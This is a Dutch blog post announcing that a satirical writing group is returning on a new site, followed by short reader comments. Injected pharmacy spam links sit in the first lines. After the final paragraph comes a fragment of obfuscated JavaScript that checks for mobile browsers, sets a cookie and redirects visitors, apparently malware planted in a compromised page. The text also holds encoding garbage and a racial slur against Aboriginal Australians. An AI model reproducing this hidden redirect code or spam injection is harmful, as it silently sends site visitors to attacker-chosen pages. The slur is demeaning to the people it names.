In dit geval is het vervolg beter

Sale amantadine http://socialevents.events/2018/02/11/buy-toprol-xl-100mg/ Price of celebrex 100mg ai???Het bloed kruipt, waar het niet gaan kanai???, luidt de steevaste verdediging van een worstenmaker tegenover de Smaakpolitie.

En zo is het net zo met de Ridders van het Vrije Woord. Schrijven, omdat het moet. Omdat het niet anders kan. Omdat het te gevaarlijk zou zijn om deze verwrongen geesten op een andere manier tot uiting te laten komen. Daarom komen we terug.

We zeggenAi??web-log.nl vaarwel; een stap die reeds bij de initiAi??le start genomen had moeten worden, maar die door onze eigen luiheid is nagelaten. We nemen het onszelf kwalijk, maar waarderen uw trouwe bezoek in de tijd dat we nog actief waren op dit brakke blog. U sloeg zich een weg door schimmige advertentiebalken en servers die meer onderhoudsmeldingen gaven dan daadwerkelijke inhoud. U verdient ons respect. De omslachtige manier van werken die we voor deze gratis blog voor lief moesten nemen, bleek voor ons een van de redenen te zijn om de handdoek in de ring te gooien.

Vanaf vandaag is dat een tijdelijke ring gebleken. Of een tijdelijke handdoek, daar wil ik nu even van af zijn; werken met metaforen is een risico van het taalvak. We laten voor de zekerheid beide zaken even achter ons en gaan weer verder. Sterker: we komen meer terug dan ooit. Met meer goede schrijvers, een fatsoenlijke site en thema’s die, als ze niet spraakmakend zijn, spraakmakend gemaakt worden. Een aantal oude rubrieken komt deels terug, nieuwe worden bijgemaakt.

Hoe het een en ander concreet gestalte zal krijgen, zal u de komende weken duidelijk worden. We zouden een vergelijking kunnen maken met een boemerang of een feniks, maar we voelen er niets voor om ons te laten meten met een stuk hout geproduceerd door een stel veredelde Australische bosnegers of een dodo-achtig beest dat een enkeltje Beverwijk verdient. Dit laten we dan ook van harte na; ons punt is zo wel gemaakt. U hoort nog van ons. |tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}


1 ster2 sterren3 sterren4 sterren5 sterren
(nog geen stemmen)
Loading ... Loading ...
Link naar deze pagina
Maak favoriet
Mail ons!
<<< Ga terug

Over de auteur

Ridder zijn is een eer, geen lunch.

4 Reacties op “In dit geval is het vervolg beter”

  1. En zo is het!

  2. Nou!

  3. Leuk, dat jullie weer begonnen zijn! Ik ben benieuwd hoe de nieuwe Ridders zich verhouden tot de oude…

  4. Sterkte en kracht toegewenst, gij allen!

Laat een bericht achter